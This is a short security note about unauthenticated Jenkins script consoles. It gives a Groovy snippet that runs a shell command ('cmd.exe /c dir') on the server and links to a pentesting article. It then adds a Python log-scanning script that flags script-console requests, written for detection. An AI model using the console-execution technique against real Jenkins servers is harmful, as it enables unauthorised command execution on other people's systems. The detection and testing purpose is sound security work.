An open Jenkins script console might give attackers a way to execute commands on the server.
Example:
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'cmd.exe /c dir'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Details: https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password
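A detection-side check for the exposure described above, as an added example that is not part of the original post: it scans reverse-proxy access logs for requests to the Jenkins script console endpoints (/script and /scriptText, including per-agent and context-path variants). The combined log format, the constructed sample lines and the admin_ips allowlist are assumptions.

```python
import re
from urllib.parse import urlsplit

# Combined log format from a reverse proxy in front of Jenkins (assumed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Path ends in /script or /scriptText, with or without a context path
# or a /computer/<agent>/ prefix.
CONSOLE_RE = re.compile(r'(^|/)(script|scriptText)/?$')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2024:09:14:02 +0000] "GET /script HTTP/1.1" 200 8123 "-" "curl/8.0"',
    '203.0.113.7 - - [10/Mar/2024:09:14:30 +0000] "POST /script HTTP/1.1" 200 9001 "-" "curl/8.0"',
    '10.0.0.5 - - [10/Mar/2024:10:00:00 +0000] "POST /jenkins/scriptText HTTP/1.1" 403 512 "-" "python-requests"',
    '10.0.0.5 - - [10/Mar/2024:10:01:00 +0000] "GET /job/build/lastBuild/console HTTP/1.1" 200 100 "-" "Mozilla"',
]

def script_console_findings(lines, admin_ips=frozenset()):
    """Return one finding per script-console request found in the log lines.

    admin_ips is a hypothetical allowlist of addresses administrators use.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log format
        path = urlsplit(m["target"]).path  # drop any query string
        if not CONSOLE_RE.search(path):
            continue
        served = m["status"] == "200"
        if not served:
            verdict = "not-served"  # e.g. 403 when access control is on
        elif m["ip"] in admin_ips:
            verdict = "served-to-admin"
        else:
            verdict = "served-to-unexpected-source"
        findings.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"], "path": path,
            # A POST answered with 200 means a script was submitted and run.
            "script_submitted": served and m["method"] == "POST",
            "verdict": verdict,
        })
    return findings

if __name__ == "__main__":
    for finding in script_console_findings(SAMPLE, admin_ips={"10.0.0.5"}):
        print(finding)
```

Any "served-to-unexpected-source" finding means the console answered a client outside the allowlist, which points to missing or too-permissive access control on the Jenkins instance.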